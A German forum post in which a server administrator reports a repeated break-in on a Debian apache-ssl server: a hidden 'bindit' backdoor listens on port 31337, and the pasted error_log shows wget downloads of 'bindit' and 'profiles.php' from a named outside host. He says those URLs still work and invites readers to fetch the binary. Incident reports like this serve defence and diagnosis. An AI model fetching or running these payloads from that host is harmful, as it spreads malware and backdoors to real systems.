Sicherheitslücke in apache-ssl?!? |
||
|---|---|---|
| #0
| ||
|
12.04.2005, 12:44
...neu hier
Beiträge: 1 |
||
 
|
|
|
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!
bitte erst » hier kostenlos registrieren!!
Folgende Themen könnten Dich auch interessieren:
Seite(n): 1
Copyright © 2024, Protecus.de - Protecus Team - Impressum / Mediadaten
Ich betreibe nun seit meheren jahren eine größere Seite und aufgrund von einer guten firewall etc gab es bisher nie probleme mit Hackern (obwohl laut logs angriffe im minutentakt stattfinden..).
Vor einigen tagen jedoch wurde mein server gehackt (wie weiß ich bis heute nicht), sprich es lief es programm namens "session" und noch ein irc-client welcher auch schon mit 98mbit/s rausballerte.
Daraufhin habe ich die kiste _komplett_ neu aufgesetzt und nur die daten rüberkopiert, keinerlei programme etc.. Aktuelle Config:
Linux babe 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux
Server version: Apache/1.3.33 Ben-SSL/1.55 (Debian GNU/Linux)
Server built: Feb 8 2005 03:33:39
Es dauerte jedoch nur wenige stunden, da wurd wieder ein programm "bindit" gestartet. Per "ps" konnte es nicht gefunden werden, "pstree" zeigte es jedoch. User war nobody. Ich habe die platte abgesucht, konnte es aber nicht finden. Mittels netstat fand ich heraus, daß es auf port 31337 lauschte - pech, denn meine firewall lässt auf diesem port nichts von außen rein.
Auf der suche wie denn der Schei... schon wieder draufgekommen sein mag, habe ich mal so einige logfiles durchforstet, und siehe da meine apache error_log zeigt folgendes:
---
[Sun Apr 10 13:03:13 2005] [notice] Apache configured -- resuming normal operations
[Sun Apr 10 13:03:13 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sun Apr 10 13:06:11 2005] [notice] SIGUSR1 received. Doing graceful restart
[Sun Apr 10 13:06:11 2005] /usr/lib/apache-ssl/gcache started
[Sun Apr 10 13:06:11 2005] [notice] Apache configured -- resuming normal operations
[Sun Apr 10 13:06:11 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sun Apr 10 13:07:55 2005] [notice] SIGUSR1 received. Doing graceful restart
[Sun Apr 10 13:07:55 2005] /usr/lib/apache-ssl/gcache started
[Sun Apr 10 13:07:55 2005] [notice] Apache configured -- resuming normal operations
[Sun Apr 10 13:07:55 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sun Apr 10 13:24:34 2005] [notice] SIGUSR1 received. Doing graceful restart
[Sun Apr 10 13:24:34 2005] /usr/lib/apache-ssl/gcache started
[Sun Apr 10 13:24:34 2005] [notice] Apache configured -- resuming normal operations
[Sun Apr 10 13:24:34 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
sh: -c: line 2: syntax error near unexpected token `;'
sh: -c: line 2: `;'
--23:00:58-- http://mitglied.lycos.de/Saschalike/bindit
=> `bindit'
Resolving mitglied.lycos.de... 212.78.204.20
Connecting to mitglied.lycos.de[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13,585 [text/plain]
0K .......... ... 100% 246.39 KB/s
23:00:58 (246.39 KB/s) - `bindit' saved [13585/13585]
sh: -c: line 2: syntax error near unexpected token `;'
sh: -c: line 2: `;'
--23:08:02-- http://mitglied.lycos.de/Saschalike/profiles.php
=> `profiles.php'
Resolving mitglied.lycos.de... 212.78.204.20
Connecting to mitglied.lycos.de[212.78.204.20]:80... connected.
HTTP request sent, awaiting response... 200 OKError in Set-Cookie, field `path'Syntax error in Set-Cookie: adFrameForcePHP=1; path= at position 24.
Length: unspecified [text/html]
profiles.php: Permission denied
Cannot write to `profiles.php' (Permission denied).
[Tue Apr 12 11:10:39 2005] [notice] SIGUSR1 received. Doing graceful restart
[Tue Apr 12 11:10:39 2005] [notice] Apache configured -- resuming normal operations
[Tue Apr 12 11:10:39 2005] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Tue Apr 12 11:10:39 2005] /usr/lib/apache-ssl/gcache started
---
die urls sind übrigens noch gültig, ihr könnt euch also die bindit mal runterziehen und schauen was das sein könnte.
meine frage ist nun: wie kommt der immer wieder auf meinen server?!?! er muss doch laut logfiles irgendwie über apache-ssl reingekommen sein, oder lieg ich da jetzt flasch?
apache-ssl läuft übrigens auch unter nobody und nogroup, system ist das neueste debian testing.
noch was: ich habe noch andere server auf denen nur apache, nicht apache-ssl, läuft. von diesen wurde bisher aber keiner gehackt...
ldd /usr/sbin/apache-ssl
libm.so.6 => /lib/tls/libm.so.6 (0x4001c000)
libpthread.so.0 => /lib/tls/libpthread.so.0 (0x4003e000)
libcrypt.so.1 => /lib/tls/libcrypt.so.1 (0x4004e000)
libdb-4.2.so => /usr/lib/libdb-4.2.so (0x4007b000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x40151000)
libdl.so.2 => /lib/tls/libdl.so.2 (0x40171000)
libssl.so.0.9.7 => /usr/lib/i686/cmov/libssl.so.0.9.7 (0x40174000)
libcrypto.so.0.9.7 => /usr/lib/i686/cmov/libcrypto.so.0.9.7 (0x401a5000)
libc.so.6 => /lib/tls/libc.so.6 (0x402a5000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
viele grüße und danke für jegliche tipps!